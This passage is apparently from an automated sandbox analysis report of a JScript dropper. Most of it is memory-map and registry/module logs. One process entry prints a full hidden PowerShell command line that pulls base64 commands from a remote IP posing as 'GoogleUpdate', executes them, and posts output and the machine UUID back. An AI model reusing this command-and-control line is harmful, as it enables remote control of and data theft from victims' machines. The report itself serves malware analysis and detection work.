| wshom.ocx | 0x7fef91d0000 | 0x7fef91f7fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x7fef9200000 | 0x7fef923bfff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x7fef9240000 | 0x7fef925cfff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x7fef9260000 | 0x7fef926afff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef92e0000 | 0x7fef931afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7fefb570000 | 0x7fefb587fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefc080000 | 0x7fefc097fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7fefda90000 | 0x7fefdb20fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7fefdd20000 | 0x7fefdd59fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7fefed90000 | 0x7fefee26fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7fefee80000 | 0x7feff0d8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7feff6e0000 | 0x7feff857fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7feff870000 | 0x7feff999fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffa8000 | 0x7fffffa8000 | 0x7fffffa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffaa000 | 0x7fffffaa000 | 0x7fffffabfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (6)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | F414C260-6AC0-11CF-B6D1-00AA00BBBB58 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | 00000323-0000-0000-C000-000000000046 | 00000146-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 275C23E2-3747-11D0-9FEA-00AA003F8646 | DCCFC164-2B38-11D2-B7EC-00C04F8F5D9A | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | WScript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Tasks\Chrome.js | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\Tasks\Chrome.js | type = size |
|
1 | |
| Get Info | C:\Windows\Tasks\Chrome.js | type = size |
|
1 | |
| Read | C:\Windows\Tasks\Chrome.js | size = 3250, size_out = 3250 |
|
1 |
Registry (30)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\.js | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\JSFile\ScriptEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\.js | data = JSFile, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\JSFile\ScriptEngine | data = JScript, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell | show_window = SW_HIDE |
|
1 |
Module (30)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x77b20000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x7feffa40000 |
|
1 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7fefdfd0000 |
|
1 | |
| Get Handle | c:\windows\system32\wscript.exe | base_address = 0xff6b0000 |
|
3 | |
| Get Handle | c:\windows\system32\ole32.dll | base_address = 0x7feffa40000 |
|
2 | |
| Get Filename | c:\windows\system32\wscript.exe | process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x77b3c4a0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegisterTraceGuidsA, address_out = 0x77c5f570 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExA, address_out = 0x7feff0fb5f0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExA, address_out = 0x7feff0fc480 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7feff100710 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetObjectContext, address_out = 0x7feffa5c920 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7feffa67490 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x7feff0fe470 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x7feff0ff9b0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x7feff0ff660 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x7feffa5a4c4 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetClassObject, address_out = 0x7feffa72e18 |
|
1 | |
| Get Address | c:\windows\system32\wscript.exe | function = 1, address_out = 0xff6bd7f8 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteExW, address_out = 0x7fefdff7c70 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = UnregisterTraceGuids, address_out = 0x77c63c80 |
|
1 | |
| Create Mapping | C:\Windows\Tasks\Chrome.js | filename = C:\Windows\Tasks\Chrome.js, protection = PAGE_READONLY, maximum_size = 3250 |
|
1 | |
| Map | C:\Windows\Tasks\Chrome.js | process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WSH-Timer, wndproc_parameter = 6117792 |
|
1 |
System (27)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
2 | |
| Get Time | type = System Time, time = 2019-01-08 12:42:06 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 212488 |
|
1 | |
| Get Time | type = System Time, time = 2019-01-08 12:42:09 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 214844 |
|
1 | |
| Get Time | type = Ticks, time = 216856 |
|
2 | |
| Get Time | type = System Time, time = 2019-01-08 12:42:21 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 226794 |
|
1 | |
| Get Time | type = System Time, time = 2019-01-08 12:42:22 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 227730 |
|
1 | |
| Get Time | type = System Time, time = 2019-01-08 12:42:32 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 238197 |
|
1 | |
| Get Time | type = Ticks, time = 240147 |
|
1 | |
| Get Time | type = Ticks, time = 240163 |
|
3 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory, result_out = ï |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = JS_PROFILER |
|
1 |
Process #15: powershell.exe
336
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "$r=[System.Net.WebRequest]::Create('http://154.16.37.122/GoogleUpdate/Update.php'); $resp=$r.GetResponse();$respstream=$resp.GetResponseStream(); $sr=new-object System.IO.StreamReader $respstream; $Cmd=$sr.ReadToEnd();$Cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Cmd)); $cmdOut=Invoke-Expression -Command:$Cmd|Out-String;$ReCmd=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmdOut));$uuid=Invoke-Expression -Command:'wmic csproduct get uuid'|Out-String;$Reuid=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($uuid));$Pusl= 'http://154.16.37.122/GoogleUpdate/Google.php?Mac=';$Pusl=$Pusl+$Reuid;$Pusl=$Pusl+'?Data=';$Pusl=$Pusl+$ReCmd;[System.Net.WebRequest]$webRequest=[System.Net.WebRequest]::Create($Pusl);$webRequest.Method='POST';$webRequest.GetResponse();"; |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:04:19, Reason: Self Terminated |
| Monitor Duration | 00:01:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x740 |
| Parent PID | 0x8dc (c:\windows\system32\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
250
0x
7EC
0x
1E0
0x
750
0x
7A0
0x
AB0
0x
AE8
0x
864
0x
570
0x
60C
0x
A4C
0x
A0C
0x
A30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | r |
|
|
|
- |
| powershell.exe.mui | 0x00160000 | 0x00162fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00200000 | 0x00203fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x01b3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b40000 | 0x01b40000 | 0x01c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c40000 | 0x01c40000 | 0x01d1efff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x01d20000 | 0x01d3ffff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01d40000 | 0x01d6ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x01d70000 | 0x01d73fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x01d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01e0ffff | Private Memory | rwx |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01e10000 | 0x01e75fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01e82fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e90000 | 0x01e90000 | 0x01e90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01f2ffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01f30000 | 0x01f32fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f60fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01f70000 | 0x01f74fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01f80000 | 0x01f87fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001f90000 | 0x01f90000 | 0x01f90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001fa0000 | 0x01fa0000 | 0x01fa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001fa0000 | 0x01fa0000 | 0x01fb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001fc0000 | 0x01fc0000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02040000 | 0x0230efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002310000 | 0x02310000 | 0x02702fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortkey.nlp | 0x02710000 | 0x02750fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x027e0000 | 0x0289ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x0291ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002920000 | 0x02920000 | 0x02a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02acffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02bd0fff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x02be0000 | 0x02c33fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x1acdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ace0000 | 0x1ace0000 | 0x1b3affff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b4a0000 | 0x1b4a0000 | 0x1b51ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b520000 | 0x1b801fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b810000 | 0x1b810000 | 0x1b90ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x75690000 | 0x75758fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f1d0000 | 0x13f246fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee0df0000 | 0x7fee178cfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee6290000 | 0x7fee6328fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee6330000 | 0x7fee639efff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fef0060000 | 0x7fef01f4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fef0200000 | 0x7fef036bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fef0370000 | 0x7fef0a14fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fef0a20000 | 0x7fef0b37fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fef0b40000 | 0x7fef0d55fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fef0d60000 | 0x7fef108dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fef1090000 | 0x7fef1becfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fef1bf0000 | 0x7fef2612fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fef2620000 | 0x7fef34fbfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fef36f0000 | 0x7fef372dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fef3730000 | 0x7fef3814fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fef3820000 | 0x7fef38c9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef38d0000 | 0x7fef3901fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fef3910000 | 0x7fef39c1fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fef9100000 | 0x7fef9168fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x7fef92c0000 | 0x7fef92c6fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
